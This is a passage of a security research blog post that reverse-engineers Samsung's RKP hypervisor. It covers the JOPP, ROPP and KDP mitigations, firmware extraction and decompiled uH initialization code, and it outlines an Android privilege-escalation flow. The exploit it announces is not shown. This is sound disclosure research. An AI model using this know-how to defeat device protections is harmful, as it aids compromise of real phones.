Disclaimer
This work was done while we were working at Longterm Security and they have kindly allowed us to mirror the original article on our company's blog.
The purpose of this blog post is to provide a comprehensive reference of the inner workings of the Samsung RKP. It enables anyone to start poking at this obscure code that is executing at a high privilege level on their device. In addition, a now-fixed vulnerability that allowed getting code execution in Samsung RKP is revealed. It is a good example of a simple mistake that compromises platform security, as the exploit consists of a single call, which is all it takes to make hypervisor memory writable from the kernel.
In the first part, we will talk briefly about Samsung's kernel mitigations (that probably deserve a blog post of their own). In the second part, we will explain how to get your hands on the RKP binary for your device.
In the third part, we will start taking apart the hypervisor framework that supports RKP on the Exynos devices, before digging into the internals of RKP in the fourth part. We will detail how it is started, how it processes the kernel page tables, how it protects sensitive data structures, and finally, how it enables the kernel mitigations.
In the fifth and last part, we will reveal the vulnerability, the one-liner exploit, and take a look at the patch.
In the mobile device world, security traditionally relied on kernel mechanisms. But history has shown us that the kernel was far from being unbreakable. For most Android devices, finding a kernel vulnerability allows an attacker to modify sensitive kernel data structures, elevate privileges, and execute malicious code.
It is also simply not enough to ensure kernel integrity at boot time (using the Verified Boot mechanism). Kernel integrity must also be verified at run time. This is what a security hypervisor aims to do. RKP, standing for Real-time Kernel Protection, is the name of Samsung's hypervisor implementation, which is part of Samsung KNOX.
There is already a lot of great research that has been done on Samsung RKP, specifically Gal Beniamini's Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection and Aris Thallas's On emulating hypervisors: a Samsung RKP case study which we both highly recommend that you read before this blog post.
A typical local privilege escalation (LPE) flow on Android involves:
address_limit
to -1;selinux_(enable|enforcing)
;uid
, gid
, sid
, capabilities, etc.Samsung has implemented mitigations to try and make that task as hard as possible for an attacker: JOPP, ROPP and KDP are three of them. Not all Samsung devices have the same mitigations in place, though.
Here is what we observed after downloading various firmware updates:
Device | Region | JOPP | ROPP | KDP |
---|---|---|---|---|
Low-end | International | No | No | Yes |
Low-end | United States | No | No | Yes |
High-end | International | Yes | No | Yes |
High-end | United States | Yes | Yes | Yes |
Jump-Oriented Programming Prevention (JOPP) aims to prevent JOP. It is a homemade CFI solution. It begins by inserting a NOP instruction before each function's start using a modified compiler toolchain. It then uses a Python script (scripts/rkp_cfp/instrument.py
) to process the compiled kernel binary: NOPs are replaced with a magic value (0xbe7bad) and indirect branches with a direct branch to a helper function.
The helper function jopp_springboard_blr_rX
(in init/rkp_cfp.S
) will check if the value before the target matches the magic value and take the jump if it does, or crash if it doesn't:
.macro springboard_blr, reg
jopp_springboard_blr_\reg:
push RRX, xzr
ldr RRX_32, [\reg, #-4]
subs RRX_32, RRX_32, #0xbe7, lsl #12
cmp RRX_32, #0xbad
b.eq 1f
...
inst 0xdeadc0de //crash for sure
...
1:
pop RRX, xzr
br \reg
.endm
Return-Oriented Programming Prevention (ROPP) aims to prevent ROP. It is a homemade "stack canary". It uses the same modified compiler toolchain to emit NOP instructions before stp x29, x30
instructions and after ldp x29, x30
instructions, and to prevent allocation of registers X16 and X17. It then uses the same Python script to replace the prologues and epilogues of assembled C functions like so:
nop
stp x29, x30, [sp,#-<frame>]!
(insns)
ldp x29, x30, ...
nop
is replaced by
eor RRX, x30, RRK
stp x29, RRX, [sp,#-<frame>]!
(insns)
ldp x29, RRX, ...
eor x30, RRX, RRK
where RRX
is an alias for X16 and RRK
for X17.
RRK is called the "thread key" and is unique to each kernel task. Instead of directly pushing the return address onto the stack, they XOR it with this key first, preventing an attacker from changing the return address without knowledge of the thread key.
The thread key itself is stored in the rrk
field of the thread_info
structure, but XORed with the RRMK.
struct thread_info {
// ...
unsigned long rrk;
};
RRMK is called the "master key". On production devices, it is stored in the system register Debug Breakpoint Control Register 5 (DBGBCR5_EL1
). It is set by the hypervisor during kernel initialization, as we will see later.
Kernel Data Protection (KDP) is another hypervisor-enabled mitigation. It is a homemade Data Flow Integrity (DFI) solution. It makes sensitive kernel data structures (like the page tables, struct cred
, struct task_security_struct
, struct vfsmount
, SELinux status, etc.) read-only thanks to the hypervisor.
For understanding Samsung RKP, you will need some basic knowledge about the virtualization extensions on ARMv8 platforms. We recommend that you read the section "HYP 101" of Lifting the (Hyper) Visor or the section "ARM Architecture & Virtualization Extensions" of On emulating hypervisors.
An hypervisor, to paraphrase these chapters, executes at a higher privilege level than the kernel, giving it complete control over it. Here is what the architecture looks like on ARMv8 platforms:
The hypervisor can receive calls from the kernel via the Hypervisor Call (HVC) instruction. Moreover, by using the Hypervisor Configuration Register (HCR), the hypervisor can trap critical operations usually handled by the kernel (access to virtual memory control registers, etc.) and also handle general exceptions.
Finally, the hypervisor is taking advantage of a second layer of address translation, called "stage 2 translation". In the standard "stage 1 translation", a Virtual Address (VA) is translated into Intermediate Physical Address (IPA). Then this IPA is translated into the final Physical Address (PA) by the second stage.
Here is what the address translation looks like with 2-stage address translation enabled:
The hypervisor still only has a single-stage address translation for its own memory accesses.
To make it easier to get started with this research, we have been using a bootloader-unlocked Samsung A51 (SM-A515F
) instead of a full exploit chain. We have downloaded the kernel source code for our device from the Samsung Open Source website, modified it, and recompiled it (which did not work out of the box).
For this research, we have implemented new syscalls:
uh_call
function).These syscalls make it really convenient to interact with RKP as you will see in the exploitation section: we just need to write a piece of C code (or Python) that will execute in userland and perform whatever we want.
RKP is implemented for both Exynos and Snapdragon-equipped devices, and both implementations share a lot of code. However, most, if not all, of the existing research has been done on the Exynos variant, as it is the most straightforward to dig into: RKP is available as a standalone binary. On Snapdragon devices, it is embedded inside the Qualcomm Hypervisor Execution Environment (QHEE) image, which is very large and complicated.
On Exynos devices, RKP used to be embedded directly into the kernel binary, and so it could be found as the vmm.elf
file in the kernel source archives. Around late 2017/early 2018, VMM was rewritten into a new framework called uH, which most likely stands for "micro-hypervisor". Consequently, the binary has been renamed to uh.elf
and can still be found in the kernel source archives for a few devices.
Because of Gal Beniamini's first suggested design improvements, on most devices, RKP has been moved out of the kernel binary and into a partition of its own called uh
. That makes it even easier to extract, for example by grabbing it from the BL_xxx.tar
archive contained in a firmware update (it is usually LZ4-compressed and starts with a 0x1000-byte header that needs to be stripped to get to the real ELF file).
The architecture has changed slightly on the S20 and later devices, as Samsung has introduced another framework to support RKP (called H-Arx
), most likely to unify even more the code base with the Snapdragon devices, and it also features more uH "apps". However, we won't be taking a look at it in this blog post.
On Snapdragon devices, RKP can be found in the hyp
partition and can also be extracted from the BL_xxx.tar
archive in a firmware update. It is one of the segments that make up the QHEE image.
The main difference with Exynos devices is that it is QHEE that sets the page tables and the exception vector. As a result, it is QHEE that notifies uH when exceptions happen (HVC or trapped system register), and uH has to make a call to QHEE when it wants to modify the page tables. The rest of the code is almost identical.
Back in 2017, the RKP binary was shipped with symbols and log strings. But that isn't the case anymore. Nowadays, the binaries are stripped, and the log strings are replaced with placeholders (like Qualcomm does). Nevertheless, we tried getting our hands on as many binaries as possible, hoping that Samsung did not do that for all of their devices, as is sometimes the case with other OEMs.
By mass downloading firmware updates for various Exynos devices, we gathered around 300 unique hypervisor binaries. None of the uh.elf
files had symbols, so we had to manually port them over from the old vmm.elf
files. Some of the uh.elf
files had the full log strings, the latest being from Apr 9 2019
.
With the full log strings and their hashed version, we could figure out that the hash value is simply the truncation of SHA256's output. Here is a Python one-liner to calculate the hash, in case you need it:
hashlib.sha256(log_string).hexdigest()[:8]
The uH framework acts as a micro-OS, of which RKP is an application. This is really more of a way to organize things, as "apps" are simply a bunch of command handlers and don't have any kind of isolation.
Before digging into the code, we will briefly tell you about the utility structures that are used extensively by uH and the RKP app. We won't be detailing their implementation, but it is important to understand what they do.
The memlist_t
structure is a list of address ranges, a sort of specialized version of a C++ vector (it has a capacity and a size).
typedef struct memlist_entry {
uint64_t addr;
uint64_t size;
uint64_t unkn_10;
uint64_t extra;
} memlist_entry_t;
typedef struct memlist {
memlist_entry_t* base;
uint32_t capacity;
uint32_t count;
uint32_t merged;
crit_sec_t cs;
} memlist_t;
There are functions to add and remove address ranges from a memlist, to check if an address is contained in a memlist, if an address range overlaps with a memlist, etc.
The sparsemap_t
structure is a map that associates values with addresses. It is created from a memlist and will map all the addresses in this memlist to a value. The size of this value is determined by the bit_per_page
field.
typedef struct sparsemap_entry {
uint64_t addr;
uint64_t size;
uint64_t bitmap_size;
uint8_t* bitmap;
} sparsemap_entry_t;
typedef struct sparsemap {
char name[8];
uint64_t start_addr;
uint64_t end_addr;
uint64_t count;
uint64_t bit_per_page;
uint64_t mask;
crit_sec_t cs;
memlist_t* list;
sparsemap_entry_t* entries;
uint32_t private;
uint32_t unkn_54;
} sparsemap_t;
There are functions to get and set the value for each entry of the map, etc.
The crit_sec_t
structure is used to implement critical sections.
typedef struct crit_sec {
uint32_t cpu;
uint32_t lock;
uint64_t lr;
} crit_sec_t;
And of course, there are functions to enter and exit the critical sections.
uH/RKP is loaded into memory by the Samsung Bootloader (S-Boot). S-Boot jumps to the EL2 entry-point by asking the secure monitor (running at EL3) to start executing hypervisor code at the address it specifies.
uint64_t cmd_load_hypervisor() {
// ...
part = FindPartitionByName("UH");
if (part) {
dprintf("%s: loading uH image from %d..\n", "f_load_hypervisor", part->block_offset);
ReadPartition(&hdr, part->file_offset, part->block_offset, 0x4c);
dprintf("[uH] uh page size = 0x%x\n", (((hdr.size - 1) >> 12) + 1) << 12);
total_size = hdr.size + 0x1210;
dprintf("[uH] uh total load size = 0x%x\n", total_size);
if (total_size > 0x200000 || hdr.size > 0x1fedf0) {
dprintf("Could not do normal boot.(invalid uH length)\n");
// ...
}
ret = memcmp_s(&hdr, "GREENTEA", 8);
if (ret) {
ret = -1;
dprintf("Could not do uh load. (invalid magic)\n");
// ...
} else {
ReadPartition(0x86fff000, part->file_offset, part->block_offset, total_size);
ret = pit_check_signature(part->partition_name, 0x86fff000, total_size);
if (ret) {
dprintf("Could not do uh load. (invalid signing) %x\n", ret);
// ...
}
load_hypervisor(0xc2000400, 0x87001000, 0x2000, 1, 0x87000000, 0x100000);
dprintf("[uH] load hypervisor\n");
}
} else {
ret = -1;
dprintf("Could not load uH. (invalid ppi)\n");
// ...
}
return ret;
}
void load_hypervisor(...) {
dsb();
asm("smc #0");
isb();
}
Please note that on recent Samsung devices, the monitor code, based on the ARM Trusted Firmware (ATF), is no longer in plain-text in the S-Boot binary. In its place, one can find an encrypted blob. A vulnerability in Samsung's Trusted OS implementation (TEEGRIS) will need to be found so that plain-text monitor code can be dumped.
The address translation process for EL1 accesses has two stages, whereas the AT process for EL2 accesses only has one. In the hypervisor code, stage 1 (abbreviated s1
) refers to the first stage of the EL2 AT process that governs hypervisor accesses. Stage 2 (abbreviated s2
) refers to the second stage of the EL1 AT process that governs kernel accesses.
Execution starts in the default
function. This function checks if it is running at EL2 before calling main
. Once main
returns, it makes an SMC, presumably to give control back to S-Boot.
void default(...) {
// ...
if (get_current_el() == (0b10 /* EL2 */ << 2)) {
// Save registers x0 to x30, sp_el1, elr_el2, spsr_el2.
// ...
// Reset the .bss section.
memset(&rkp_bss_start, 0, 0x1000);
main(saved_regs.x0, saved_regs.x1, &saved_regs);
}
// Return to S-Boot after initialization.
asm("smc #0");
}
After disabling the alignment checks and making sure the binary is loaded at the expected address (0x87000000 for this binary), main
sets TTBR0_EL2
to its initial page tables and calls s1_enable
to enable address translation at EL2. The initial page tables for EL2, embedded directly in the hypervisor binary, contain a 1:1 mapping of the uH region.
int32_t main(int64_t x0, int64_t x1, saved_regs_t* regs) {
// ...
// SCTLR_EL2, System Control Register (EL2).
//
// - A, bit [1] = 0: Alignment fault checking disabled.
// - SA, bit [3] = 0: SP Alignment check disabled.
set_sctlr_el2(get_sctlr_el2() & 0xfffffff5);
// Prevent the hypervisor from being initialized twice.
if (!initialized) {
initialized = 1;
// Check if the loading address is as expected.
if (&hyp_base != 0x87000000) {
uh_log('L', "slsi_main.c", 326, "[-] static s1 mmu mismatch");
return -1;
}
// Set the EL2 page tables start address.
set_ttbr0_el2(&static_s1_page_tables_start__);
// Enable the EL2 address translation.
s1_enable();
// Initialize the hypervisor.
uh_init(0x87000000, 0x200000);
// Initialize the virtual memory manager (VMM).
if (vmm_init()) {
return -1;
}
uh_log('L', "slsi_main.c", 338, "[+] vmm initialized");
// Set the second stage EL1 page tables start address.
set_vttbr_el2(&static_s2_page_tables_start__);
uh_log('L', "slsi_main.c", 348, "[+] static s2 mmu initialized");
// Enable the second stage of EL1 address translation.
s2_enable();
uh_log('L', "slsi_main.c", 351, "[+] static s2 mmu enabled");
}
uh_log('L', "slsi_main.c", 355, "[*] initialization completed");
return 0;
}
s1_enable
sets mostly cache-related fields of MAIR_EL2
, TCR_EL2
, and SCTLR_EL2
, and most importantly, enables the MMU for the EL2. main
then calls the uh_init
function and passes it the uH memory range. It seems that Gal Beniamini's second suggested design improvement, setting the WXN bit to 1, has also been implemented by the Samsung KNOX team.
void s1_enable() {
// ...
cs_init(&s1_lock);
// MAIR_EL2, Memory Attribute Indirection Register (EL2).
//
// - Attr0, bits[7:0] = 0xff: Normal memory, Outer & Inner Write-Back Non-transient, Outer & Inner Read-Allocate
// Write-Allocate).
// - Attr1, bits[15:8] = 0x00: Device-nGnRnE memory.
// - Attr2, bits[23:16] = 0x44: Normal memory, Outer & Inner Write-Back Transient, Outer & Inner No Read-Allocate No
// Write-Allocate).
set_mair_el2(get_mair_el2() & 0xffffffffff000000 | 0x4400ff);
// TCR_EL2, Translation Control Register (EL2).
//
// - T0SZ, bits [5:0] = 24: TTBR0_EL2 region size is 2^40.
// - IRGN0, bits [9:8] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
// - ORGN0, bits [11:10] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
// - SH0, bits [13:12] = 0b11: Inner Shareable.
// - PS, bits [18:16] = 0b010: PA size is 40 bits, 1TB.
set_tcr_el2(get_tcr_el2() & 0xfff8c0c0 | 0x23f18);
flush_entire_cache();
sctlr_el2 = get_sctlr_el2();
// SCTLR_EL2, System Control Register (EL2).
//
// - C, bit [2] = 1: data is cacheable for EL2.
// - I, bit [12] = 1: instruction access is cacheable for EL2.
// - WXN, bit [19] = 1: writeable implies non-executable for EL2.
set_sctlr_el2(sctlr_el2 & 0xfff7effb | 0x81004);
invalidate_entire_s1_el2_tlb();
// - M, bit [0] = 1: EL2 stage 1 address translation enabled.
set_sctlr_el2(sctlr_el2 & 0xfff7effa | 0x81005);
}
After saving the arguments into a global control structure called uh_state
, uh_init
calls static_heap_initialize
. This function also saves its arguments into global variables and initializes the doubly linked list of heap chunks with a single free chunk spanning over the hypervisor memory range.
uh_init
then calls static_heap_remove_range
to remove three important ranges from the memory that can be returned by the static heap allocator (effectively splitting the original chunk into multiple ones):
int64_t uh_init(int64_t uh_base, int64_t uh_size) {
// ...
// Reset the global state of the hypervisor.
memset(&uh_state.base, 0, sizeof(uh_state));
// Save the hypervisor base address and size.
uh_state.base = uh_base;
uh_state.size = uh_size;
// Initialize the static heap with the whole hypervisor memory.
static_heap_initialize(uh_base, uh_size);
// But remove the log, uH and bigdata regions from it.
if (!static_heap_remove_range(0x87100000, 0x40000) || !static_heap_remove_range(&hyp_base, 0x87046000 - &hyp_base) ||
!static_heap_remove_range(0x870ff000, 0x1000)) {
uh_panic();
}
// Initialize the log region.
memory_init();
uh_log('L', "main.c", 131, "================================= LOG FORMAT =================================");
uh_log('L', "main.c", 132, "[LOG:L, WARN: W, ERR: E, DIE:D][Core Num: Log Line Num][File Name:Code Line]");
uh_log('L', "main.c", 133, "==============================================================================");
uh_log('L', "main.c", 134, "[+] uH base: 0x%p, size: 0x%lx", uh_state.base, uh_state.size);
uh_log('L', "main.c", 135, "[+] log base: 0x%p, size: 0x%x", 0x87100000, 0x40000);
uh_log('L', "main.c", 137, "[+] code base: 0x%p, size: 0x%p", &hyp_base, 0x46000);
uh_log('L', "main.c", 139, "[+] stack base: 0x%p, size: 0x%p", stacks, 0x10000);
uh_log('L', "main.c", 143, "[+] bigdata base: 0x%p, size: 0x%p", 0x870ffc40, 0x3c0);
uh_log('L', "main.c", 152, "[+] date: %s, time: %s", "Feb 27 2020", "17:28:58");
uh_log('L', "main.c", 153, "[+] version: %s", "UH64_3b7c7d4f exynos9610");
// Register the command handlers for the INIT app.
uh_register_commands(0, init_cmds, 0, 5, 1);
// Register the command handlers for the RKP app.
j_rkp_register_commands();
uh_log('L', "main.c", 370, "%d app started", 1);
// Initialize the INIT app.
system_init();
// Initialize the other apps (including the RKP app).
apps_init();
// Initialize the bigdata region.
uh_init_bigdata();
// Initialize the context buffer.
uh_init_context();
// Create the memlist of memory regions used by the dynamic heap allocator.
memlist_init(&uh_state.dynamic_regions);
// Create and fill the memlist of protected ranges (critical memory regions).
pa_restrict_init();
// Mark the hypervisor as initialized.
uh_state.inited = 1;
uh_log('L', "main.c", 427, "[+] uH initialized");
return 0;
uh_init
then calls memory_init
which zeroes out the log region and maps it into the EL2 page tables. This region will be used by the printf
-like string printing functions, which are called inside of the uh_log
function.
int64_t memory_init() {
// Reset the log region.
memory_buffer = 0x87100000;
memset(0x87100000, 0, 0x40000);
cs_init(&memory_cs);
clean_invalidate_data_cache_region(0x87100000, 0x40000);
memory_buffer_index = 0;
memory_active = 1;
// Map it into the hypervisor page tables as writable.
return s1_map(0x87100000, 0x40000, UNKN3 | WRITE | READ);
}
uh_init
then logs various information using uh_log
(these messages can be retrieved from /proc/uh_log
on the device). uh_init
then calls uh_register_commands
and rkp_register_commands
(which ends up calling uh_register_commands
but with a different set of arguments).
uh_register_commands
takes as arguments the application ID, an array of command handlers, an optional command "checker" function, the number of commands in the array, and a debug flag. These values will be stored in the fields cmd_evtable
, cmd_checkers
, cmd_counts
, and cmd_flags
of the uh_state
structure and will be used to handle hypervisor calls coming from the kernel.
int64_t uh_register_commands(uint32_t app_id,
int64_t cmd_array,
int64_t cmd_checker,
uint32_t cmd_count,
uint32_t flag) {
// ...
// Ensure the hypervisor hasn't already been initialized.
if (uh_state.inited) {
uh_log('D', "event.c", 11, "uh_register_event is not permitted after uh_init : %d", app_id);
}
// Perform sanity-checking on the application ID.
if (app_id >= 8) {
uh_log('D', "event.c", 14, "wrong app_id %d", app_id);
}
// Save the arguments into the `uh_state` global variable.
uh_state.cmd_evtable[app_id] = cmd_array;
uh_state.cmd_checkers[app_id] = cmd_checker;
uh_state.cmd_counts[app_id] = cmd_count;
uh_state.cmd_flags[app_ip] = flag;
uh_log('L', "event.c", 21, "app_id:%d, %d events and flag(%d) has registered", app_id, cmd_count, flag);
// The "command checker" is optional.
if (cmd_checker) {
uh_log('L', "event.c", 24, "app_id:%d, cmd checker enforced", app_id);
}
return 0;
}
According to the kernel sources, there are only 3 applications defined, even though uH technically supports up to 8.
APP_INIT
, which is used by S-Boot during initialization;APP_SAMPLE
, which is unused;APP_RKP
, which is used by the kernel to interact with RKP.#define APP_INIT 0
#define APP_SAMPLE 1
#define APP_RKP 2
#define UH_PREFIX UL(0xc300c000)
#define UH_APPID(APP_ID) ((UL(APP_ID) & UL(0xFF)) | UH_PREFIX)
enum __UH_APP_ID {
UH_APP_INIT = UH_APPID(APP_INIT),
UH_APP_SAMPLE = UH_APPID(APP_SAMPLE),
UH_APP_RKP = UH_APPID(APP_RKP),
};
uh_init
then calls system_init
and apps_init
. These functions call the command handler #0 of the corresponding app(s): system_init
of APP_INIT
and apps_init
of all the other registered applications. In our case, it will end up calling init_cmd_init
and rkp_cmd_init
, respectively.
uint64_t system_init() {
// ...
memset(&saved_regs, 0, sizeof(saved_regs));
// Call the command handler #0 of APP_INIT.
res = uh_handle_command(0, 0, &saved_regs);
if (res) {
uh_log('D', "main.c", 380, "system init failed %d", res);
}
return res;
}
uint64_t apps_init() {
// ...
memset(&saved_regs, 0, sizeof(saved_regs));
// Iterate on all applications but APP_INIT.
for (i = 1; i != 8; ++i) {
// Ensure the application is registered.
if (uh_state.cmd_evtable[i]) {
uh_log('W', "main.c", 393, "[+] dst %d initialized", i);
// Call the command handler #0 of the application.
res = uh_handle_command(i, 0, &saved_regs);
if (res) {
uh_log('D', "main.c", 396, "app init failed %d", res);
}
}
}
return res;
}
uh_handle_command
prints the app ID, command ID, and its arguments if the debug flag was set, calls the command checker function if any, and then calls the appropriate command handler.
int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
// ...
// If debug is enabled, log the command to be handled.
if ((uh_state.cmd_flags[app_id] & 1) != 0) {
uh_log('L', "main.c", 441, "event received %lx %lx %lx %lx %lx %lx", app_id, cmd_id, regs->x2, regs->x3, regs->x4,
regs->x5);
}
// If a "command checker" is registered for the application, call it.
cmd_checker = uh_state.cmd_checkers[app_id];
if (cmd_id && cmd_checker && cmd_checker(cmd_id)) {
uh_log('E', "main.c", 448, "cmd check failed %d %d", app_id, cmd_id);
return -1;
}
// Perform sanity-checking on the application ID.
if (app_id >= 8) {
uh_log('D', "main.c", 453, "wrong dst %d", app_id);
}
// Ensure the destination application is registered.
if (!uh_state.cmd_evtable[app_id]) {
uh_log('D', "main.c", 456, "dst %d evtable is NULL\n", app_id);
}
// Perform sanity-checking on the command ID.
if (cmd_id >= uh_state.cmd_counts[app_id]) {
uh_log('D', "main.c", 459, "wrong type %lx %lx", app_id, cmd_id);
}
// Get the actual command handler.
cmd_handler = uh_state.cmd_evtable[app_id][cmd_id];
if (!cmd_handler) {
uh_log('D', "main.c", 464, "no handler %lx %lx", app_id, cmd_id);
return -1;
}
// And finally, call it.
return cmd_handler(regs);
}
uh_init
then calls uh_init_bigdata
and uh_init_context
.
uh_init_bigdata
allocates and zeroes out the buffers used by the analytics feature. It also makes the bigdata region accessible as read/write in the EL2 page tables.
int64_t uh_init_bigdata() {
// Allocate a buffer to store the analytics collected.
if (!bigdata_state) {
bigdata_state = malloc(0x230, 0);
}
// Reset this buffer and the bigdata global state.
memset(0x870ffc40, 0, 960);
memset(bigdata_state, 0, 560);
// Map this buffer into the hypervisor as writable.
return s1_map(0x870ff000, 0x1000, UNKN3 | WRITE | READ);
}
uh_init_context
allocates and zeroes out a buffer that is used to store the hypervisor registers on platform resets (we don't know where it is used, maybe by the monitor to restore the hypervisor state on some event).
int64_t* uh_init_context() {
// ...
// Allocate a buffer to store the processor context.
uh_context = malloc(0x1000, 0);
if (!uh_context) {
uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
}
// Reset this buffer.
return memset(uh_context, 0, 0x1000);
}
uh_init
calls memlist_init
to initialize the dynamic_regions
memlist in the uh_state
structure, which will contain the memory regions that can be used by the dynamic allocator, and then calls the pa_restrict_init
function.
pa_restrict_init
initializes the protected_ranges
memlist, which contains the critical hypervisor memory regions that should be protected, and adds the hypervisor memory region to it. It also checks that rkp_cmd_counts
and the protected_ranges
structures are contained in the memlist as they should be.
int64_t pa_restrict_init() {
// Initialize the memlist of protected ranges.
memlist_init(&protected_ranges);
// Add the uH memory region to it (containing the hypervisor code and data).
protected_ranges_add(0x87000000, 0x200000);
// Sanity-check: it must contain the `rkp_cmd_counts` array.
if (!protected_ranges_contains(&rkp_cmd_counts)) {
uh_log('D', "pa_restrict.c", 79, "Error, cmd_cnt not within protected range, cmd_cnt addr : %lx", rkp_cmd_counts);
}
// Sanity-check: it must also contain itself.
if (!protected_ranges_contains(&protected_ranges)) {
uh_log('D', "pa_restrict.c", 84, "Error protect_ranges not within protected range, protect_ranges addr : %lx",
&protected_ranges);
}
return uh_log('L', "pa_restrict.c", 87, "[+] uH PA Restrict Init");
}
uh_init
returns to main
, which then calls vmm_init
to initialize the virtual memory management system at EL1.
vmm_init
sets the VBAR_EL2
register to the exception vector containing the hypervisor functions to be called to handle exceptions, and enables trapping of accesses to the virtual memory control registers at EL1.
int64_t vmm_init() {
// ...
uh_log('L', "vmm.c", 142, ">>vmm_init<<");
cs_init(&stru_870355E8);
cs_init(&panic_cs);
// Set the vector table of the hypervisor.
set_vbar_el2(&vmm_vector_table);
// HCR_EL2, Hypervisor Configuration Register.
//
// TVM, bit [26] = 1: EL1 write accesses to the specified EL1 virtual memory control registers are trapped to EL2.
hcr_el2 = get_hcr_el2() | 0x4000000;
uh_log('L', "vmm.c", 161, "RKP_398bc59b %x", hcr_el2);
set_hcr_el2(hcr_el2);
return 0;
}
uh_init
then sets the VTTBR_EL2
register to the pages tables that will be used for the second stage address translation at EL1. These are the page tables that translate a kernel IPA into an actual PA. Finally, before returning, uh_init
calls s2_enable
.
s2_enable
configures the second stage of address translation and enables it.
void s2_enable() {
// ...
cs_init(&s2_lock);
// VTCR_EL2, Virtualization Translation Control Register.
//
// - T0SZ, bits [5:0] = 24: VTTBR_EL2 region size is 2^40.
// - SL0, bits [7:6] = 0b01: Stage 2 translation lookup start at level 1.
// - IRGN0, bits [9:8] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
// - ORGN0, bits [11:10] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
// - SH0, bits [13:12] = 0b11: Inner Shareable.
// - TG0, bits [15:14] = 0b00: Granule size is 4KB.
// - PS, bits [18:16] = 0b010: PA size is 40 bits, 1TB.
set_vtcr_el2(get_vtcr_el2() & 0xfff80000 | 0x23f58);
invalidate_entire_s1_s2_el1_tlb();
// HCR_EL2, Hypervisor Configuration Register.
//
// VM, bit [0] = 1: EL1&0 stage 2 address translation enabled.
set_hcr_el2(get_hcr_el2() | 1);
lock_start = 1;
}
We mentioned that uh_init
calls the command #0 for each of the registered applications. Let's see what is being executed for the two applications that are used: APP_INIT
and APP_RKP
.
APP_INIT
¶The command handlers registered for APP_INIT
are:
Command ID | Command Handler | Maximum Calls |
---|---|---|
0x00 | init_cmd_init |
- |
0x02 | init_cmd_add_dynamic_region |
- |
0x03 | init_cmd_id_0x03 |
- |
0x04 | init_cmd_initialize_dynamic_heap |
- |
Let's take a look at command handler #0 called in uh_init
. It is really simple: it sets the fault_handler
field of uh_state
. This structure contains the address of a kernel function that will be called when a fault is detected by the hypervisor.
int64_t init_cmd_init(saved_regs_t* regs) {
// ...
// Ensure the fault handler can only be set once.
if (!uh_state.fault_handler && regs->x2) {
// Save the value provided into `uh_state`.
uh_state.fault_handler = rkp_get_pa(regs->x2);
uh_log('L', "main.c", 161, "[*] uH fault handler has been registered");
}
return 0;
}
When uH calls this command, it won't do anything as the registers, including x2, are all set to 0. But this command will also be called later by the kernel, as can be seen in the rkp_init
function in init/main.c
.
static void __init rkp_init(void)
{
uh_call(UH_APP_INIT, 0, uh_get_fault_handler(), kimage_voffset, 0, 0);
// ...
}
Let's take a look at the fault handler registered by the kernel. It comes from the call to uh_get_fault_handler
, which reveals that it is actually the uh_fault_handler
function.
u64 uh_get_fault_handler(void)
{
uh_handler_list.uh_handler = (u64) & uh_fault_handler;
return (u64) & uh_handler_list;
}
We can see in the definition of the uh_handler_list
structure that the argument of the fault handler will be an instance of the uh_handler_data
structure, which contains the values of some EL2 system registers as well as the general registers stored in the uh_registers
structure.
typedef struct uh_registers {
u64 regs[31];
u64 sp;
u64 pc;
u64 pstate;
} uh_registers_t;
typedef struct uh_handler_data{
esr_t esr_el2;
u64 elr_el2;
u64 hcr_el2;
u64 far_el2;
u64 hpfar_el2;
uh_registers_t regs;
} uh_handler_data_t;
typedef struct uh_handler_list{
u64 uh_handler;
uh_handler_data_t uh_handler_data[NR_CPUS];
} uh_handler_list_t;
The uh_fault_handler
function will print information about the fault before calling do_mem_abort
and finally panic
.
void uh_fault_handler(void)
{
unsigned int cpu;
uh_handler_data_t *uh_handler_data;
u32 exception_class;
unsigned long flags;
struct pt_regs regs;
spin_lock_irqsave(&uh_fault_lock, flags);
cpu = smp_processor_id();
uh_handler_data = &uh_handler_list.uh_handler_data[cpu];
exception_class = uh_handler_data->esr_el2.ec;
if (!exception_class_string[exception_class]
|| exception_class > esr_ec_brk_instruction_execution)
exception_class = esr_ec_unknown_reason;
pr_alert("=============uH fault handler logging=============\n");
pr_alert("%s",exception_class_string[exception_class]);
pr_alert("[System registers]\n", cpu);
pr_alert("ESR_EL2: %x\tHCR_EL2: %llx\tHPFAR_EL2: %llx\n",
uh_handler_data->esr_el2.bits,
uh_handler_data->hcr_el2, uh_handler_data->hpfar_el2);
pr_alert("FAR_EL2: %llx\tELR_EL2: %llx\n", uh_handler_data->far_el2,
uh_handler_data->elr_el2);
memset(®s, 0, sizeof(regs));
memcpy(®s, &uh_handler_data->regs, sizeof(uh_handler_data->regs));
do_mem_abort(uh_handler_data->far_el2, (u32)uh_handler_data->esr_el2.bits, ®s);
panic("%s",exception_class_string[exception_class]);
}
The other two APP_INIT
commands are used during initialization of the hypervisor framework. They are not called by the kernel but by S-Boot before the kernel is actually loaded and executed.
In dtb_update
, S-Boot will call command #2 for each memory
node in the Device Tree Blob (DTB). The arguments of this call are the memory region address and its size. It will then call the command #4 with two pointers to local variables that will be filled by the hypervisor as arguments.
int64_t dtb_update(...) {
// ...
dtb_find_entries(dtb, "memory", j_uh_add_dynamic_region);
sprintf(path, "/reserved-memory");
offset = dtb_get_path_offset(dtb, path);
if (offset < 0) {
dprintf("%s: fail to get path [%s]: %d\n", "dtb_update_reserved_memory", path, offset);
} else {
heap_base = 0;
heap_size = 0;
dtb_add_reserved_memory(dtb, offset, 0x87000000, 0x200000, "el2_code", "el2,uh");
uh_call(0xC300C000, 4, &heap_base, &heap_size, 0, 0);
dtb_add_reserved_memory(dtb, offset, heap_base, heap_size, "el2_earlymem", "el2,uh");
dtb_add_reserved_memory(dtb, offset, 0x80001000, 0x1000, "kaslr", "kernel-kaslr");
if (get_env_var(FORCE_UPLOAD) == 5)
rmem_size = 0x2400000;
else
rmem_size = 0x1700000;
dtb_add_reserved_memory(dtb, offset, 0xC9000000, rmem_size, "sboot", "sboot,rmem");
}
// ...
}
